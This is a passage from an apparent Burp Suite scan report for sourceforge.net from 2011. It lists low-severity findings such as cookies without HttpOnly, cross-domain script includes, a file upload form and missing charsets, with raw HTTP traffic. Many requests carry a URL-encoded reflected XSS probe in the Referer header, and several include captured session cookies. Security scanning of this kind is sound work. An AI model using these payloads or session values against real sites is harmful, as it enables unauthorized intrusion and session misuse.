Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:50 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:50 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d9605a8e0b0f919648983c97825853c3f4f54aedgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPJNtdlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 668
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "0118c1a5289f6e7b7727ecf3ff8847c1", "bytes": 36884520.0, "sf_file_id": 3334755, "filename": "/UltraStar Delux
...[SNIP]...

2.26. http://sourceforge.net/projects/unetbootin/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/unetbootin/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/unetbootin/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:50 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:50 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d1602d9898db149c537121b971e3b4470848cf52gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPIPSqlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 597
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "54bd54f3fbad128207d509521d3dc401", "bytes": 4770816.0, "sf_file_id": 3900629, "filename": "/UNetbootin/549/u
...[SNIP]...

2.27. http://sourceforge.net/projects/virtualdub/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/virtualdub/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/virtualdub/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:50 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:50 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d6d341daa21a613e82b1dcf1788cbc73013d85c7gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPJCUeVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 611
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "d72bda914fe13c4e05a8dba79d46e7fb", "bytes": 1707366.0, "sf_file_id": 3526073, "filename": "/virtualdub-win/1
...[SNIP]...

2.28. http://sourceforge.net/projects/wampserver/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/wampserver/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/wampserver/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:52 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:52 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=86c5f57c632eda5ffd1870e690458aa1c27b20e8gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPSJFHFUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 671
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "9729a6b6979859668367e24fc68a17d3", "bytes": 20608447.0, "sf_file_id": 3559949, "filename": "/WampServer 2/Wa
...[SNIP]...

2.29. http://sourceforge.net/projects/xampp/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/xampp/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/xampp/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:51 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:51 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=7c1bcd566b0a2b7a0e813360aa2d7b80df3490c8gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPPA+dVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 632
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "84d88cb5b9471dd8d1d7b7952df9c2bf", "bytes": 66303148.0, "sf_file_id": 3611028, "filename": "/XAMPP Windows/1
...[SNIP]...

3. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://sourceforge.net/projects/georaptor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/georaptor/ HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:11:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:11:54 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d4fa2343ac25ac743e125505369900aa7706146dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037+1qaFVVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 30678
Access-Control-Allow-Origin: *

<!doctype html>
<!-- Server: sfs-consume-7 -->

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]>
...[SNIP]...
</script>


<script src="http://a.fsdn.com/con/js/sftheme/modernizr.custom.90514.js"></script>

<script src="http://a.fsdn.com/con/js/lib/jquery-1.5.1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...
</footer>
<script src="http://a.fsdn.com/con/js/min/sf.js?1308333563" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s3.amazonaws.com/ki.js/16994/3eh.js" async></script>
...[SNIP]...

3.2. http://sourceforge.net/projects/georaptor/reviews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/georaptor/reviews/ HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/georaptor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: project_details=hide; __utmz=191645736.1308359518.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=191645736.453693884.1308359518.1308359518.1308359518.1; __utmb=191645736.1.10.1308359518; __utmc=191645736; ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; ki_t=1308359528446%3B1308359528446%3B1308359528446%3B1%3B1; VISITOR=4dfbfb5886502b7c30001429; sf.consume=7d9208e416c459bc4aeff0a987593a39bb944f7dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/IrJlulUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:16:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:16:59 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=9f77813dee623d4bf9dc48e9738c2e6bbd968224gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/IuN4p1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 20585
Access-Control-Allow-Origin: *

<!doctype html>
<!-- Server: sfs-consume-3 -->

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]>
...[SNIP]...
</script>


<script src="http://a.fsdn.com/con/js/sftheme/modernizr.custom.90514.js"></script>

<script src="http://a.fsdn.com/con/js/lib/jquery-1.5.1.js"></script>
...[SNIP]...
</footer>
<script src="http://a.fsdn.com/con/js/min/sf.js?1308333563" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s3.amazonaws.com/ki.js/16994/3eh.js" async></script>
...[SNIP]...

3.3. http://sourceforge.net/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /search/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Set-Cookie: PHPSESSID=098d46b43f016162fdfd8d635678a9d2; expires=Sat, 02-Jul-2011 01:38:27 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:27 GMT
Server: lighttpd/1.4.26
Content-Length: 80719

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8"
...[SNIP]...
</style>


<script src="//www.google.com/adsense/search/ads.js" type="text/javascript"></script>
...[SNIP]...

4. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /projects/georaptor/ HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:11:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:11:54 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d4fa2343ac25ac743e125505369900aa7706146dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037+1qaFVVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 30678
Access-Control-Allow-Origin: *

<!doctype html>
<!-- Server: sfs-consume-7 -->

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]>
...[SNIP]...
<div class="field">
<input name="icon" id="icon" class="file" type="file"/>
</div>
...[SNIP]...

5. HTML does not specify charset  previous  next
There are 13 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


5.1. http://sourceforge.net/export/rss2_projnews.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /export/rss2_projnews.php

Request

GET /export/rss2_projnews.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Content-Type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:19 GMT
Server: lighttpd/1.4.26
Content-Length: 70

An error occurred (bad group ID specified) during RSS feed generation.

5.2. http://sourceforge.net/hostedapp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /hostedapp/

Request

GET /hostedapp/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
